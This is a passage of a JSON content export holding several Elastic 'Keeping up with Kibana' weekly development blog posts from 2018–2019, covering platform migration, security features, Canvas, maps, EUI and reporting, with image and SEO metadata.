Team\u003c/strong\u003e\u003c/p\u003e","callout":[],"category":[],"created_at":"2019-04-18T10:54:02.726Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"_version":3,"is_dir":false,"uid":"blt7851c5531de64259","ACL":{},"content_type":"image/png","created_at":"2019-01-05T05:57:30.864Z","created_by":"sys_blt57a423112de8a853","description":"","file_size":"85352","filename":"blog-thumb-release-kibana.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-release-kibana.png","updated_at":"2022-02-11T21:03:50.956Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:15.814Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7851c5531de64259/601055c982548c0f8284c39d/blog-thumb-release-kibana.png"},"markdown_l10n":"","publish_date":"2019-04-15T19:30:06.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"This week in Kibana for April 15th","seo_description_l10n":"Conversion to the new platform has begun! Feature controls PR is in. New functionality went into Elastic Charts, GIS app and Canvas.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blta7f9bd01bfb78b2c","created_by":"blt3044324473ef223b70bc674c","updated_by":"bltde77f2161b811714","created_at":"2018-12-18T07:05:00.602Z","updated_at":"2019-04-05T22:08:53.570Z","content_type":"image/jpeg","file_size":"129522","filename":"kibana-timeseries.jpg","title":"kibana-timeseries.jpg","ACL":{},"_version":2,"is_dir":false,"tags":[],"description":"","parent_uid":null,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-18T15:18:23.068Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta7f9bd01bfb78b2c/5ca7d1f5082f61c34628d2eb/kibana-timeseries.jpg"},"title":"Keeping up with Kibana: This week in Kibana for April 15th, 2019","title_l10n":"Keeping up with Kibana: This week in Kibana for April 15th, 2019","updated_at":"2024-11-07T00:13:33.656Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/keeping-up-with-kibana-2019-04-15","publish_details":{"time":"2024-11-07T00:13:38.409Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt58520b9d356c9f4e","_version":10,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt636e684e9f6f3a8b"],"body_l10n":"\u003cp\u003eLots of good progress on some exciting new features!\u003c/p\u003e\n\u003cp\u003e\u003cspan\u003e\u003c/span\u003e\u003c/p\u003e\n\u003ch3\u003eHiring\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://jobs.elastic.co/jobs/kibana/distributed/kibana-visualisations-vega-engineer/1418186\"\u003eKibana - Visualisations \u0026amp; Vega Engineer\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://jobs.elastic.co/jobs/kibana/anywhere-/kibana-gis-data-engineer/1569367\"\u003eKibana - GIS Data Engineer\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://jobs.elastic.co/jobs/kibana/distributed/kibana-senior-javascript-engineer/1143849\"\u003eKibana - Senior JavaScript Engineer\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://jobs.elastic.co/jobs/kibana/distributed-global/kibana-senior-software-engineer-operations/1595759\"\u003eKibana - Senior Software Engineer - Operations\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://jobs.elastic.co/jobs/kibana/distributed/kibana-platform-javascript-engineer-node-js-/1292795\"\u003eKibana - Platform JavaScript Engineer (Node.js)\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://jobs.elastic.co/jobs/product-management/distributed-amer-or-western-europe/director-sr-director-product-management-kibana/1571633\"\u003eDirector / Sr Director Product Management - Kibana\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003ch4\u003eFeature Controls\u003c/h4\u003e\n\u003cp\u003eThis week for Feature Controls was dedicated to crafting release highlights and a blog post introducing the feature. We expect to have the blog post drafted early next week!\u003c/p\u003e\n\u003ch4\u003eNew Platform Migration\u003c/h4\u003e\n\u003cp\u003eWe previously began work on migrating the spaces plugin to the new platform, and we continued this effort this week. Aleh also began looking into migrating the security plugin’s authentication to the new platform. Once authentication is migrated, we’ll then be focusing on moving over the authorization components of both the spaces and security plugins.\u003c/p\u003e\n\u003ch4\u003eCopy Saved Objects to Spaces (\u003ca href=\"https://github.com/elastic/kibana/issues/37286\"\u003e#37286\u003c/a\u003e)\u003c/h4\u003e\n\u003cp\u003eWe started an \u003ca href=\"https://github.com/elastic/kibana/pull/38014\"\u003eexploratory PR\u003c/a\u003e for the API that will power this feature. After discussions, we decided to work on preparing the underlying infrastructure for this API in a series of smaller PRs to make the work more manageable. Specifically:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eRefactoring \u0026amp; simplifying `savedObjectsManagement` UI Capabilities\u003c/li\u003e\n \u003cli\u003eRe-order the Saved Objects Client Wrappers that security and spaces implement to allow the spaces plugin to inform the security plugin which space to authorize against, without the security plugin having to derive this information from the request itself.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePlatform\u003c/h3\u003e\n\u003ch4\u003eNew Platform Services\u003c/h4\u003e\n\u003cp\u003eUnblocking Security Integration\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eSupport for route tags has been merged (\u003ca href=\"https://github.com/elastic/kibana/pull/37344\"\u003e#37344\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eExposing session storage to auth providers is in review (\u003ca href=\"https://github.com/elastic/kibana/pull/37992\"\u003e#37992\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eMigrating Saved Objects to NP\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eSaved Objects conversion to TypeScript has been merged (\u003ca href=\"https://github.com/elastic/kibana/pull/36829\"\u003e#36829\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eWork has begun on migrating the SavedObjectClient to the NP (no PR yet)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eApplicationService\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eThe Handler Context (\u003ca href=\"https://github.com/elastic/kibana/pull/36509\"\u003e#36509\u003c/a\u003e) and ApplicationService RFCs (\u003ca href=\"https://github.com/elastic/kibana/pull/36477\"\u003e#36477\u003c/a\u003e) are in the final comment period\u003c/li\u003e\n \u003cli\u003eRemoval of the last legacy dependencies for the Header UI is in review (\u003ca href=\"https://github.com/elastic/kibana/pull/38175\"\u003e#38175\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eAn end-to-end proof-of-concept prototype of frontend routing and integration with the legacy platform has been proven out. Implementation of this will begin once the Header UI is moved to the new platform. We expect this effort to require many PRs to complete.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLicensing Plugin\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eInvestigation and planning for this plugin will begin next week.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCleanup\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eSimplifying the integration between legacy and new platforms on the client has been merged (\u003ca href=\"https://github.com/elastic/kibana/pull/37734\"\u003e#37734\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eMoving the Chrome and I18n APIs to the start phase was merged (\u003ca href=\"https://github.com/elastic/kibana/pull/37915\"\u003e#37915\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eMaking the basePath API on the server consistent with the client is in review (\u003ca href=\"https://github.com/elastic/kibana/pull/38237\"\u003e#38237\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eKibana Clustering\u003c/h4\u003e\n\u003cp\u003eTo\u0026nbsp;met with the Code team this week to go over the in-progress proxy implementation (\u003ca href=\"https://github.com/elastic/kibana/pull/36907\"\u003e#36907\u003c/a\u003e). We’re on the same page and got some good feedback on a few more necessary asks for the initial beta release in 7.3.\u003c/p\u003e\n\u003cp\u003eNext week, we’re meeting with the Security team to review authorization, authentication, TLS and PKI protection for this new HTTP port. We want to explore getting as close to Elasticsearch’s security model for cluster access while making it a smooth experience for plugin developers wanting to use Kibana Clustering.\u003c/p\u003e\n\u003ch3\u003eOperations\u003c/h3\u003e\n\u003cp\u003eDuring the course of the week we continued our efforts on updating our dependencies merging and auditing the continuous PRs automatically created by renovate. A lot of those are still expected in the next week. We have also merged a patched version of the relative cache loader which has now fixed the windows development bugs introduced when we merged it the first time. Worth it to mention that we also shipped to useful scripts for developers: one to merge the base branch into the prs (which is a super common operation) with a simple script call and the other to generate the renovate config which will make it easier to others update the renovate config. We are now also using babel 7 to compile x-pack as we replaced the typescript compiler by the babel compiler in the @kbn/plugin-helpers package\u003c/p\u003e\n\u003cp\u003ePrs:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eDeclare @kbn/babel-preset as peerDependency for @kbn/plugin-helpers \u003ca href=\"https://github.com/elastic/kibana/pull/37710\"\u003e#37710\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e[dev/license_checker][dev/npm] reactor, ts-ify, de-grunt \u003ca href=\"https://github.com/elastic/kibana/pull/37807\"\u003e#37807\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e[dev/failed_tests] try to ignore irrelevant failures \u003ca href=\"https://github.com/elastic/kibana/pull/37902\"\u003e#37902\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e[scripts/update_prs] implement script to merge base branch into prs \u003ca href=\"https://github.com/elastic/kibana/pull/38302\"\u003e#38302\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e[jest] don't be crazy, run with caching enabled \u003ca href=\"https://github.com/elastic/kibana/pull/38332\"\u003e#38332\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eImplement renovate config generator \u003ca href=\"https://github.com/elastic/kibana/pull/38369\"\u003e#38369\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eFix typo in failure filtering \u003ca href=\"https://github.com/elastic/kibana/pull/38374\"\u003e#38374\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eRelative cache loader \u003ca href=\"https://github.com/elastic/kibana/pull/36131\"\u003e#36131\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eGeo-Maps App\u003c/h3\u003e\n\n\u003ch4\u003eEnhancements\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003e[in review] GeoJson upload \u003ca href=\"https://github.com/elastic/kibana/pull/36410\"\u003e\u003cspan\u003e\u003c/span\u003e\u003c/a\u003e\u003ca href=\"https://github.com/elastic/kibana/pull/36410\"\u003ehttps://github.com/elastic/kibana/pull/36410\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e[in review] Symbolize points as icons [in review] \u003ca href=\"https://github.com/elastic/kibana/pull/37822\"\u003e\u003cspan\u003e\u003c/span\u003e\u003c/a\u003e\u003ca href=\"https://github.com/elastic/kibana/pull/37822\"\u003ehttps://github.com/elastic/kibana/pull/37822\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e[in review] add support for Top Hits to Documents source [in review] \u003ca href=\"https://github.com/elastic/kibana/pull/38052\"\u003e\u003cspan\u003e\u003c/span\u003e\u003c/a\u003e\u003ca href=\"https://github.com/elastic/kibana/pull/38052\"\u003ehttps://github.com/elastic/kibana/pull/38052\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eGeo-Elastic Maps Service\u003c/h3\u003e\n\u003cul\u003e\n \u003cli\u003eUpdated EMS landing page with themed tiles\u003c/li\u003e\n \u003cli\u003eUpdated Dark theme tiles to better align with Kibana dark theming\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eApp Architecture\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/elastic/kibana/pull/37510\"\u003eEmbeddableAPI branch\u003c/a\u003e was merged and we are now ready to move dashboard over to the new embeddable API. Dashboard code was typescripted as well.\u003c/p\u003e\n\u003cp\u003eMore interpreter types are being moved from canvas to OSS and\u003ca href=\"https://github.com/elastic/kibana/pull/37968\"\u003e error handling\u003c/a\u003e was added to expression runner.\u003c/p\u003e\n\u003cp\u003eMigration to new platform is moving as planned, a lot of angular was removed and our plan on how to migrate is close to ready.\u003c/p\u003e\n\u003ch3\u003eKibana App (Visulizations, Sharing, Discover, Reporting)\u003c/h3\u003e\n\u003ch4\u003eLens (New visual editor)\u003c/h4\u003e\n\u003cp\u003eBegan integrating our work this week, getting our first configurable chart with real data:\u003c/p\u003e\n\n\u003cp\u003eThis screenshot is not based on the feature branch yet, but it shows that our individual work is adding up to something larger.\u003c/p\u003e\n\u003cp\u003eThis week we:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eMerged the \u003ca href=\"https://github.com/elastic/kibana/pull/37391\"\u003econfig panel\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eMerged \u003ca href=\"https://github.com/elastic/kibana/pull/37648\"\u003eexpression rendering\u003c/a\u003e and \u003ca href=\"https://github.com/elastic/kibana/pull/37876\"\u003exy expression functions\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eMerged a PR for converting the \u003ca href=\"https://github.com/elastic/kibana/pull/37967\"\u003eXY chart state into an expression\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eMerged a change to pass the \u003ca href=\"https://github.com/elastic/kibana/pull/38142\"\u003edatasource API into the visualization\u003c/a\u003e for column IDs\u003c/li\u003e\n \u003cli\u003eBuilt out the editor UI for users to \u003ca href=\"https://github.com/elastic/kibana/pull/37573\"\u003ebuild queries\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eIntegrated \u003ca href=\"https://github.com/elastic/kibana/pull/37711\"\u003edrag and drop for building queries\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eElastic Charts\u003c/h4\u003e\n\u003cp\u003eKQL:\u003c/p\u003e\n\u003cp\u003eUsing KQL with the autocomplete it offers makes it easier to create a query for a visualization without the need to remember the exact field name and it assists with operators and values.\u003c/p\u003e\n\u003cp\u003eKQL has been added to the Visual Builder using components that update as a query is entered (having immediate effect on the visualization rendered) with the option of using Kuery syntax with autocomplete or Lucene syntax (defaulting to the syntax set in the Kibana advanced settings).\u003c/p\u003e\n\u003cp\u003ePreviously saved visualizations are migrated to accommodate the change. We assume that if the query language is not present, it is Lucene syntax.\u003c/p\u003e\n\n\n\u003cp\u003e\u003cbr /\u003e\u003c/p\u003e\n\u003ch3\u003eDesign + Docs\u003c/h3\u003e\n\u003cp\u003eKibana now has EUI 11.0.1 (The icons one!), and EUI 11.3.1 (The color picker one!) is merging soon\u003c/p\u003e\n\u003cp\u003eYou can now utilize custom icons on Kibana using EUI. This helps us so that we no longer need to package the entirety of the Internet’s logos in EUI directly and gives you flexibility when you might need something custom for you application. Please \u003ca href=\"https://elastic.github.io/eui/#/display/icons\"\u003eread the docs\u003c/a\u003e to learn how this works.\u003c/p\u003e\n\u003ch4\u003eData grids\u003c/h4\u003e\n\u003cp\u003eWe are still very very early into our work on data grids. Right now we’re finishing up a feature spec for the component and doing some very rough proof of concepts for the rendering layer.\u003c/p\u003e\n\u003cp\u003eCheck the demo showing \u003ca href=\"https://codesandbox.io/s/datagrid-div-custom-dom-structure-pyfrb\"\u003ehow we might handle resizing rows and columns\u003c/a\u003e.\u003c/p\u003e\n\n\u003cp\u003eAnd then another demo showing \u003ca href=\"https://codesandbox.io/s/hookedondatagrids-gx1zk\"\u003ehow we might utilize React hooks for subscribing to updates for the style and content of the cells\u003c/a\u003e.\u003c/p\u003e\n\n\u003ch4\u003eCompressed panels experiments\u003c/h4\u003e\n\u003cp\u003eOne comment we’ve head as we build more and more complicated “panel editors” (think the right side of Canvas and Maps) is that the forms we use for EUI are a little too beefy when jammed into those sidebars. We’ve started some initial experiments trying to compress them down. Likely these won’t involve too many new formal components but more a guideline for how to create slimmer forms utilizing our popover and label append / prepend mechanics. Here’s a screen to show how some of this might be done in the Maps application.\u003c/p\u003e\n\n\u003ch4\u003eStarting to think about embeds\u003c/h4\u003e\n\u003cp\u003eThis is a week of taking stabs at early concepts. We’re doing some thinking about app to app embeds and how we can make generic systems (like a button that leads to a flyout) that allows one app to pull saved objects from another.\u003c/p\u003e\n\n\u003ch3\u003eQA\u003c/h3\u003e\n\u003ch4\u003eCloud Testing\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003eAnalyzing and opening issues on latest test runs\u003c/li\u003e\n \u003cli\u003eIssues can be found here and require triage by relevant functional teams:\u003ca href=\"https://github.com/elastic/kibana/projects/20\"\u003e \u003cspan\u003e\u003c/span\u003e\u003c/a\u003e\u003ca href=\"https://github.com/elastic/kibana/projects/20\"\u003ehttps://github.com/elastic/kibana/projects/20\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eVisual Testing\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003e\u003ca href=\"https://github.com/elastic/kibana/issues/33817\"\u003eTest plan phase 1\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003eWorking on getting visual regression into Kibana FTR \u0026nbsp;\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eGeneral\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003eTeam continues to test 7.2.0 Release Build candidates.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStack Services\u003c/h3\u003e\n\u003ch4\u003eAlerting\u003c/h4\u003e\n\u003cp\u003eThis week good progress has been made on creating a basic alerting plugin, we are finalizing testing before the PR is good to merge (\u003ca href=\"https://github.com/elastic/kibana/pull/37043\"\u003e#37043\u003c/a\u003e). There are some final adjustments on error handling and validation to be made next week.\u003c/p\u003e\n\u003ch3\u003eReporting\u003c/h3\u003e\n\u003cul\u003e\n \u003cli\u003eSome “behind-the-scenes” work on Scheduled reports … stay tuned!\u003c/li\u003e\n \u003cli\u003eCSV’s with special characters now show a special warning in Kibana as they’re a method of attack injection.\u003c/li\u003e\n \u003cli\u003eMore work and docs forthcoming for SDH/Support issues. We’ve noticed an uptick in incoming SDH issues that are reporting based (largely due to the new version of Chromium that we’ve bundled).\u0026gt;html here\u003c/li\u003e\n\u003c/ul\u003e","callout":[],"category":[],"created_at":"2019-06-10T17:31:29.946Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"full_bleed_image":{"_version":3,"is_dir":false,"uid":"blt7851c5531de64259","ACL":{},"content_type":"image/png","created_at":"2019-01-05T05:57:30.864Z","created_by":"sys_blt57a423112de8a853","description":"","file_size":"85352","filename":"blog-thumb-release-kibana.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-release-kibana.png","updated_at":"2022-02-11T21:03:50.956Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:15.814Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7851c5531de64259/601055c982548c0f8284c39d/blog-thumb-release-kibana.png"},"markdown_l10n":"","publish_date":"2019-06-10T17:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"This week in Kibana for June 10, 2019","seo_description_l10n":"New functionality went into security, geo, embeddables, Elastic charts, alerting, telemetry, and EUI.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blta7f9bd01bfb78b2c","created_by":"blt3044324473ef223b70bc674c","updated_by":"bltde77f2161b811714","created_at":"2018-12-18T07:05:00.602Z","updated_at":"2019-04-05T22:08:53.570Z","content_type":"image/jpeg","file_size":"129522","filename":"kibana-timeseries.jpg","title":"kibana-timeseries.jpg","ACL":{},"_version":2,"is_dir":false,"tags":[],"description":"","parent_uid":null,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-18T15:18:23.068Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta7f9bd01bfb78b2c/5ca7d1f5082f61c34628d2eb/kibana-timeseries.jpg"},"title":"Keeping up with Kibana: This week in Kibana for June 10, 2019","title_l10n":"Keeping up with Kibana: This week in Kibana for June 10, 2019","updated_at":"2024-11-07T00:11:51.436Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/keeping-up-with-kibana-2019-06-10","publish_details":{"time":"2024-11-07T00:11:57.384Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt229293e56388a866","_version":8,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt613ce7bc42d2579c"],"body_l10n":"\u003ch4\u003eWelcome to Keeping up with Kibana! This is a series of posts on new developments in the Kibana project and any related learning resources and events.\u003c/h4\u003e\n\u003ch3\u003eGeo\u003c/h3\u003e\n\n \u003cp\u003eThe \u003ca href=\"http://maps.elastic.co/\"\u003eElastic Maps Service landing page\u003c/a\u003e is now available! This page shows the data behind the vector layers that can be joined to Elasticsearch data in Kibana region maps.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt556140c6dd5da5d9/5f9b20f667a7c3549260359b/blog-keeping-up-with-kibana-2018-07-09-1.png\" data-sys-asset-uid=\"blt556140c6dd5da5d9\" alt=\"blog-keeping-up-with-kibana-2018-07-09-1.png\" /\u003e\u003c/p\u003e\n\n\u003ch3\u003ePRs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eElastic Maps Service landing page deployment handled by Jenkins jobs (\u003ca href=\"https://github.com/elastic/ems-landing-page/pull/27\"\u003eems-landing-page#27\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n \n\n \u003ch3\u003eCanvas\u003c/h3\u003e\n\n\n \u003cp\u003eThe redesign, new layout engine, and reporting are all on the verge of merge. Also, Verge of Merge is the name of our new band. We're opening for Party Marty, it's gonna be rad. $10 cover. No outside food or drink. After party at your house.\u003c/p\u003e\n \n \u003ch4\u003eAutomatic Expression Formatting\u003c/h4\u003e\n \u003cp\u003eIf you've used Canvas at any length, you've probably spent some time formatting the expression so it's easier to read, only to have all that effort thrown out when you changed something from the sidebar. Canvas will now auto-format the expression for you, so even if you smash stuff in there like a clod, Canvas will make it look good!\u003c/p\u003e\n\n \n \u003ch4\u003eCase Insensitive Functions\u003c/h4\u003e\n \u003cp\u003eCan't remember if it's “pointseries” or “pointSeries”? Now you don't have to! Functions are now case-insensitive, so it doesn't matter which one you use, they both work. And much like arguments have aliases, functions do too, but now they actually work.\u003c/p\u003e\u003cbr bold=\"[object Object]\"/\u003e\n \u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd603af41eb46a133/5f9b21401a81c1644e9970bf/blog-keeping-up-with-kibana-2018-07-09-3.png\" data-sys-asset-uid=\"bltd603af41eb46a133\" alt=\"blog-keeping-up-with-kibana-2018-07-09-3.png\" /\u003e\u003c/p\u003e\n\n\u003ch4\u003eOther Stuff\u003c/h4\u003e\n\n \u003cp\u003eCanvas also fixed some important bugs. Canvas now correctly uses the selected index pattern in the esdocs UI, elements correctly report when they are done rendering (something Reporting relies on), and errors from AJAX requests are now shown to the user. We also removed an undocumented and unused run API since we're no longer planning for plugin authors to execute expressions that way.\u003c/p\u003e\n\n\u003ch3\u003ePlatform\u003c/h3\u003e\n\u003ch4\u003eLocalization\u003c/h4\u003e\n\n \u003cp\u003eThe \u003ca href=\"https://github.com/elastic/kibana/pull/20525\"\u003efirst PR\u003c/a\u003e has landed to update an entire feature of Kibana to be translatable! We started with the index pattern page in management, and we'll use this particular PR to smooth out any edges in the i18n UI abstractions so that we can roll out i18n support throughout the rest of Kibana without churning on details.\u003c/p\u003e\n \n \u003cp\u003eThe pace of our localization effort as a whole has taken off as \u003ca href=\"https://github.com/elastic/kibana/pulls?q=is%3Aopen+is%3Apr+label%3A%3Ai18n\"\u003epull requests\u003c/a\u003e get opened sometimes more than once a day. We're currently reviewing tools for verifying proper translation coverage in CI, extracting translatable attributes from templates to seed translation files, and providing a json diff of translation changes for new versions, as well as PRs for improved test coverage and developer documentation.\u003c/p\u003e\n \n\n\u003ch4\u003eNew platform\u003c/h4\u003e\n\n \u003cp\u003eThe foundation of the new platform on the server is ready, and now that more than half the team is back from vacation, we can get it merged. After this gets merged, some of the things we'll be focusing on in the server will be the new saved object service, elasticsearch service, and the plugin service.\u003c/p\u003e\n \n \u003cp\u003eThe new platform in the UI made great progress. In the feature branch, all apps are now being bootstrapped through the new platform, and the chrome and fatal error pages are being reactified and moved to the new platform.\u003c/p\u003e\n\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003ch4\u003eRBAC Phase 1\u003c/h4\u003e\n\n \u003cp\u003eModifications were made to the deprecation logging when using the legacy fallback, and we are only logging deprecation warnings on user login. Additional integration tests were added for the Elasticsearch APIs that don't have sufficient coverage with our saved object based integration tests. The Elasticsearch PR which makes it possible for us to use the Kibana index name as part of the application name has merged.\u003c/p\u003e\n \n\n\u003ch4\u003eSpaces\u003c/h4\u003e\n\n \u003cp\u003eThe requested changes to make the saved object client space aware have been made, and it's ready for another review.\u003c/p\u003e\n\n\u003ch3\u003eOperation\u003c/h3\u003e\n\u003ch4\u003eOptimizer\u003c/h4\u003e\n\n \u003cp\u003eWe made some progress on came up with possible solutions, not to completely remove the optimizer, but at least to understand how to increase its performance on production while we reduce the on-fly compilation needed. The POC we were running on webpack-dlls allowed us to validate the possibility of generate DLLs for Kibana (even if those dlls have dependencies between them).\u003c/p\u003e\n\n\u003ch3\u003eDesign\u003c/h3\u003e\n\n \u003cp\u003eThe design team continues to finalize fixing the popover bugs and building out the basic new Vis editor prototype. We are trying to catch up on some small bugs/issues and work out some overarching responsive layouts. The Dashboard and Watcher docs have been updated.\u003c/p\u003e\n \n \u003cp\u003eEUI version status\u003c/p\u003e\n \u003cp\u003e\u003ca href=\"https://elastic.github.io/eui/#/package/changelog\" \u003eEUI is now at 1.1.0\u003c/a\u003e\u003c/p\u003e\n \n \u003cul\u003e\n \u003cli\u003eKibana master is at EUI 1.1.0!\u003c/li\u003e\n \u003cli\u003eCloud master is at EUI 1.0.1. No breaking changes to upgrade\u003c/li\u003e\n \u003c/ul\u003e\n \n \u003cp\u003ePRs\u003c/p\u003e\n \u003cp\u003e\u003cspan style=\"font-weight: normal;\"\u003e\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003eExperimental EuiXYChart and associated components have been added! (\u003ca href=\"https://github.com/elastic/eui/pull/309\" \u003e#309\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eFixed some IE11 flex box bugs (modal overflowing, image shrinking, and flex group wrapping) and documented others. (\u003ca href=\"https://github.com/elastic/eui/pull/973\" \u003e#973\u003c/a\u003e)\u003c/li\u003e\n \u003c/ul\u003e\n\n\n\n\u003ch3\u003eManagement\u003c/h3\u003e\n\u003cp\u003eThe management team is continuing to work on supporting rollup index patterns in visualization and discover areas. Some PRs to convert Notifier usages to toastNotifications were also merged.\u003c/p\u003e\n\n \u003cp\u003ePRs\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003e(Rollup support) Refactor SearchSource interface (\u003ca href=\"https://github.com/elastic/kibana/pull/20334\"\u003e#20334\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003e(Rollup support) Add AggTypeFieldFilters to filter out fields in vis editor (\u003ca href=\"https://github.com/elastic/kibana/pull/20539\"\u003e#20539\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eFix bug in propFilter logic when it's not passed any filters (\u003ca href=\"https://github.com/elastic/kibana/pull/20569\"\u003e#20569\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eConvert various uses of notifier to toastNotifications (\u003ca href=\"https://github.com/elastic/kibana/pull/20420\"\u003e#20420\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eReplace uses of Notifier with toastNotifications in Watcher (\u003ca href=\"https://github.com/elastic/kibana/pull/20538\"\u003e#20538\u003c/a\u003e)\u003c/li\u003e\n \u003c/ul\u003e\n\n\n\u003ch3\u003eSharing\u003c/h3\u003e\n\n \u003cp\u003ePRs\u003c/p\u003e\n \u003cp\u003e[input controls] update dropdown suggestions when filtered \u003ca href=\"https://github.com/elastic/kibana/pull/18985\"\u003ePR 18985\u003c/a\u003e\u003c/p\u003e\n\n\u003ch3\u003eVisualizations\u003c/h3\u003e\n\n\n \u003cp\u003eThe visualizations team is still busy removing Angular from a lot of places in preparation for the using the Canvas pipeline for rendering (half of the PRs seen below).\u003c/p\u003e\n \u003cp\u003eThe first experimental version of the new chart component in EUI has now been merged into EUI (\u003ca href=\"https://github.com/elastic/eui/pull/309\"\u003eeui/#309\u003c/a\u003e). You can check its documentation and samples in the \u003ca href=\"https://elastic.github.io/eui/#/xy-charts-beta/general\"\u003eEUI documentation\u003c/a\u003e.\u003c/p\u003e\n \n \u003cp\u003eVega visualizations now have the possibility to create filters in Kibana using specific functions (\u003ca 